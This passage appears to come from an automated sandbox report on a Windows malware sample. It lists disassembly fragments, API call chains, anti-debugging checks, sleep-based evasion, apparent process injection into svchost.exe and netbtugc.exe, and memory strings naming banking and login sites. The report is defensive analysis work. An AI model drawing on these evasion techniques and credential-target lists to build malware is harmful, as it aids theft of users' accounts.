Code function: 0_2_00C3C304 LoadLibraryA,GetProcAddress,

0_2_00C3C304

Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BE8B85 push ecx; ret	0_2_00BE8B98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_006048A9 push esp; ret	2_2_006048AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0061E2BA push 00000038h; iretd	2_2_0061E2BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0061A436 push ebx; iretd	2_2_0061A600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00618C92 pushad ; retf	2_2_00618C93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0061A5D9 push ebx; iretd	2_2_0061A600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_006017E5 push ebp; retf 003Fh	2_2_006017E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_006147A2 push es; iretd	2_2_006147AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00603780 push eax; ret	2_2_00603782
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0320225F pushad ; ret	2_2_032027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032027FA pushad ; ret	2_2_032027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032309AD push ecx; mov dword ptr [esp], ecx	2_2_032309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0320283D push eax; iretd	2_2_03202858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0320135E push eax; iretd	2_2_03201369
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032A09AD push ecx; mov dword ptr [esp], ecx	4_2_032A09B6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00A1101F push es; iretd	4_2_00A11027
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00A1D1B0 push es; ret	4_2_00A1D1D0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00A01126 push esp; ret	4_2_00A01127
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00A12238 pushad ; iretd	4_2_00A12239
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00A1550F pushad ; retf	4_2_00A15510
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00A1AB37 push 00000038h; iretd	4_2_00A1AB3B
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00A16CB3 push ebx; iretd	4_2_00A16E7D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00A10EAB push ebp; retf	4_2_00A10EAC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00A1FEF5 push FFFFFFBAh; ret	4_2_00A1FEF7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00A16E56 push ebx; iretd	4_2_00A16E7D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00A0FFA0 push esi; iretd	4_2_00A0FFA5

Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BC4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00BC4A35
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00C455FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00C455FD

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00BE33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00BE33C7

Source: C:\Users\user\Desktop\150-425-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0327096E rdtsc

2_2_0327096E

Source: C:\Windows\SysWOW64\netbtugc.exe

Window / User API: threadDelayed 9714

Jump to behavior

Source: C:\Users\user\Desktop\150-425-2024.exe	API coverage: 5.0 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\netbtugc.exe	API coverage: 2.7 %

Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7868	Thread sleep count: 258 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7868	Thread sleep time: -516000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7868	Thread sleep count: 9714 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7868	Thread sleep time: -19428000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe TID: 7876	Thread sleep time: -70000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe TID: 7876	Thread sleep time: -43500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe TID: 7876	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe TID: 7876	Thread sleep time: -33000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00C24696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00C24696
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00C2C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00C2C9C7
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00C2C93C FindFirstFileW,FindClose,	0_2_00C2C93C
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00C2F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C2F200
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00C2F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C2F35D
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00C2F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C2F65E
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00C23A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00C23A2B
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00C23D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00C23D4E
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00C2BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C2BF27
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00A1BAB0 FindFirstFileW,FindNextFileW,FindClose,	4_2_00A1BAB0

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00BC4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00BC4AFE

Source: F56GKLK7U4.4.dr	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: F56GKLK7U4.4.dr	Binary or memory string: global block list test formVMware20,11696497155
Source: F56GKLK7U4.4.dr	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3914462258.0000000000E6F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: F56GKLK7U4.4.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: F56GKLK7U4.4.dr	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: netbtugc.exe, 00000004.00000002.3910307845.0000000002BEE000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.1875805325.000001FD7885C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: F56GKLK7U4.4.dr	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: F56GKLK7U4.4.dr	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: F56GKLK7U4.4.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: F56GKLK7U4.4.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: F56GKLK7U4.4.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: F56GKLK7U4.4.dr	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: F56GKLK7U4.4.dr	Binary or memory string: AMC password management pageVMware20,11696497155
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: F56GKLK7U4.4.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: F56GKLK7U4.4.dr	Binary or memory string: discord.comVMware20,11696497155f
Source: F56GKLK7U4.4.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: F56GKLK7U4.4.dr	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: F56GKLK7U4.4.dr	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: F56GKLK7U4.4.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: F56GKLK7U4.4.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: F56GKLK7U4.4.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Users\user\Desktop\150-425-2024.exe	API call chain: ExitProcess graph end node			graph_0-98757
Source: C:\Users\user\Desktop\150-425-2024.exe	API call chain: ExitProcess graph end node			graph_0-98826

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0327096E rdtsc

2_2_0327096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00617823 LdrLoadDll,

2_2_00617823

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00C341FD BlockInput,

0_2_00C341FD

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00BC3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00BC3B4C

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00BF5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00BF5CCC

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00C3C304 LoadLibraryA,GetProcAddress,

0_2_00C3C304

Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_038D3500 mov eax, dword ptr fs:[00000030h]	0_2_038D3500
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_038D3560 mov eax, dword ptr fs:[00000030h]	0_2_038D3560
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_038D1ED0 mov eax, dword ptr fs:[00000030h]	0_2_038D1ED0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]	2_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]	2_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]	2_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C310 mov ecx, dword ptr fs:[00000030h]	2_2_0322C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03250310 mov ecx, dword ptr fs:[00000030h]	2_2_03250310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D437C mov eax, dword ptr fs:[00000030h]	2_2_032D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov ecx, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FA352 mov eax, dword ptr fs:[00000030h]	2_2_032FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D8350 mov ecx, dword ptr fs:[00000030h]	2_2_032D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]	2_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]	2_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]	2_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325438F mov eax, dword ptr fs:[00000030h]	2_2_0325438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325438F mov eax, dword ptr fs:[00000030h]	2_2_0325438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]	2_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]	2_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]	2_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032663FF mov eax, dword ptr fs:[00000030h]	2_2_032663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EC3CD mov eax, dword ptr fs:[00000030h]	2_2_032EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]	2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]	2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]	2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]	2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B63C0 mov eax, dword ptr fs:[00000030h]	2_2_032B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]	2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]	2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]	2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h]	2_2_032D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h]	2_2_032D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322823B mov eax, dword ptr fs:[00000030h]	2_2_0322823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]	2_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]	2_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]	2_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322826B mov eax, dword ptr fs:[00000030h]	2_2_0322826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B8243 mov eax, dword ptr fs:[00000030h]	2_2_032B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B8243 mov ecx, dword ptr fs:[00000030h]	2_2_032B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A250 mov eax, dword ptr fs:[00000030h]	2_2_0322A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236259 mov eax, dword ptr fs:[00000030h]	2_2_03236259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h]	2_2_032EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h]	2_2_032EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402A0 mov eax, dword ptr fs:[00000030h]	2_2_032402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402A0 mov eax, dword ptr fs:[00000030h]	2_2_032402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h]	2_2_0326E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h]	2_2_0326E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]	2_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]	2_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]	2_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]	2_2_032402E1
